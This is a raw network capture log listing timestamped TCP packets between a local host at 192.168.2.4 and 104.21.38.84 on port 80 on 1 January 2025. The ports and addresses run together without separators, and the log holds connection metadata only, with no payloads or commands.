                                                                                                                          Jan 1, 2025 04:22:39.226139069 CET8049786104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:39.226208925 CET4978680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:39.226289034 CET4978680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:39.231012106 CET8049786104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:39.584395885 CET4978680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:39.592441082 CET8049786104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:39.693404913 CET8049786104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:39.740452051 CET4978680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:39.955635071 CET8049786104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.006063938 CET4978680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.080502033 CET4978680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.081089020 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.085714102 CET8049786104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.085772991 CET4978680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.085932970 CET8049787104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.085989952 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.086086988 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.090862989 CET8049787104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.443707943 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.448589087 CET8049787104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.540417910 CET8049787104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.584109068 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.816406012 CET8049787104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.865449905 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.936021090 CET4978580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.936019897 CET4974280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.936022997 CET4975280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.940563917 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.941164970 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.945527077 CET8049787104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.945585012 CET4978780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.945979118 CET8049788104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:40.946043015 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.946154118 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:40.950942993 CET8049788104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:41.303076982 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.307993889 CET8049788104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:41.390074968 CET8049788104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:41.443507910 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.581012011 CET8049788104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:41.631144047 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.706186056 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.706825018 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.711200953 CET8049788104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:41.711272001 CET4978880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.711632967 CET8049789104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:41.711714983 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.711786985 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:41.716542959 CET8049789104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.068814993 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.073632956 CET8049789104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.156637907 CET8049789104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.209146976 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.354821920 CET8049789104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.396842957 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.471374989 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.471868038 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.475567102 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.476488113 CET8049789104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.476553917 CET4978980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.476703882 CET8049790104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.476766109 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.476875067 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.480427027 CET8049791104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.480487108 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.480591059 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.481618881 CET8049790104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.485347033 CET8049791104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.834417105 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.834418058 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.839303970 CET8049791104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.839322090 CET8049791104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.839333057 CET8049790104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.925000906 CET8049790104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.932794094 CET8049791104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:42.974806070 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:42.974808931 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.190776110 CET8049791104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.191448927 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.193171024 CET8049790104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.193216085 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.196501970 CET8049790104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.196538925 CET4979080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.240369081 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.315067053 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.315824986 CET4979280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.320054054 CET8049791104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.320108891 CET4979180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.320677042 CET8049792104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.320745945 CET4979280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.320871115 CET4979280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.325628042 CET8049792104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.678014040 CET4979280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:43.682838917 CET8049792104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.765563965 CET8049792104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:43.818481922 CET4979280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.035346031 CET8049792104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.084188938 CET4979280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.169236898 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.174124002 CET8049793104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.174196005 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.174256086 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.179075003 CET8049793104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.521789074 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.526705980 CET8049793104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.627803087 CET8049793104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.677959919 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.814193010 CET8049793104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.865387917 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.942118883 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.942740917 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.947164059 CET8049793104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.947235107 CET4979380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.947545052 CET8049794104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:44.947611094 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.947731018 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:44.952541113 CET8049794104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:45.326267958 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.331149101 CET8049794104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:45.395667076 CET8049794104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:45.443484068 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.611814022 CET8049794104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:45.662252903 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.864173889 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.864829063 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.869184971 CET8049794104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:45.869231939 CET4979480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.869607925 CET8049795104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:45.869663000 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.869968891 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:45.875016928 CET8049795104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:46.225135088 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.232419968 CET8049795104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:46.343324900 CET8049795104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:46.396698952 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.527405977 CET8049795104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:46.568491936 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.642894983 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.643562078 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.649020910 CET8049795104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:46.649081945 CET4979580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.649295092 CET8049796104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:46.649358988 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.649450064 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:46.654998064 CET8049796104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.006088018 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.010982990 CET8049796104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.093760014 CET8049796104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.146619081 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.359278917 CET8049796104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.412231922 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.505234003 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.505538940 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.511538029 CET8049796104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.511584997 CET8049797104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.511606932 CET4979680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.511662960 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.511791945 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.516644001 CET8049797104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.866169930 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:47.871108055 CET8049797104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:47.956862926 CET8049797104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.005991936 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.278357983 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.283231020 CET8049798104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.283297062 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.292324066 CET8049797104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.325735092 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.330535889 CET8049798104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.340377092 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.455324888 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.460211039 CET8049799104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.460284948 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.462125063 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.466880083 CET8049799104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.677963018 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.682925940 CET8049798104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.682965040 CET8049798104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.727843046 CET8049798104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.771616936 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.818664074 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:48.823472977 CET8049799104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.923768044 CET8049799104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:48.974759102 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.073256016 CET8049798104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.131069899 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.195593119 CET8049799104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.240372896 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.315241098 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.315241098 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.315634966 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.315958977 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.320373058 CET8049799104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.320776939 CET8049798104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.320789099 CET8049800104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.320806980 CET8049797104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.320847988 CET4979980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.320861101 CET4979880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.320898056 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.320914030 CET4979780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.327280998 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.332189083 CET8049800104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.677999020 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:49.683171988 CET8049800104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.765594959 CET8049800104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:49.818597078 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.029515982 CET8049800104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.084120989 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.156398058 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.156867981 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.161547899 CET8049800104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.161618948 CET4980080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.161806107 CET8049801104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.161866903 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.161951065 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.166766882 CET8049801104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.506217003 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.511145115 CET8049801104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.606259108 CET8049801104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.646617889 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:50.938395977 CET8049801104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.968254089 CET8049801104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:50.968421936 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.188600063 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.189080000 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.193671942 CET8049801104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:51.193734884 CET4980180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.193938017 CET8049802104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:51.194004059 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.194093943 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.198930025 CET8049802104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:51.553220987 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.558151007 CET8049802104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:51.640928030 CET8049802104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:51.693557978 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:51.908433914 CET8049802104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:51.959147930 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.032453060 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.032991886 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.037489891 CET8049802104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.037563086 CET4980280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.037812948 CET8049803104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.037878990 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.037993908 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.042828083 CET8049803104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.396804094 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.401710987 CET8049803104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.491364002 CET8049803104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.537239075 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.663158894 CET8049803104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.709217072 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.782293081 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.782798052 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.787302971 CET8049803104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.787460089 CET4980380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.787621021 CET8049805104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:52.787683964 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.787784100 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:52.792557001 CET8049805104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:53.157778978 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.162772894 CET8049805104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:53.231676102 CET8049805104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:53.287247896 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.503355980 CET8049805104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:53.552993059 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.590100050 CET8049805104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:53.646739006 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.832056046 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.837846041 CET8049805104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:53.839471102 CET4980580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.850167036 CET4980680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.855027914 CET8049806104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:53.855092049 CET4980680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.858690023 CET4980680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:53.863452911 CET8049806104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.166306973 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.166374922 CET4980680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.190603971 CET8049807104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.191479921 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.191706896 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.196548939 CET8049807104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.227224112 CET8049806104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.227463961 CET4980680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.300378084 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.305221081 CET8049808104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.305322886 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.305439949 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.311182976 CET8049808104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.537659883 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.542529106 CET8049807104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.542609930 CET8049807104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.662436962 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.667242050 CET8049808104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.671747923 CET8049807104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.724740982 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.777077913 CET8049808104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.834130049 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:54.848155022 CET8049807104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:54.896636963 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.101548910 CET8049808104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:55.146733046 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.220324993 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.220328093 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.220978975 CET4980980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.225352049 CET8049808104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:55.225603104 CET8049807104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:55.225657940 CET4980880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.225678921 CET4980780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.225874901 CET8049809104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:55.227499008 CET4980980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.238003969 CET4980980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:55.242799044 CET8049809104.21.38.84192.168.2.4
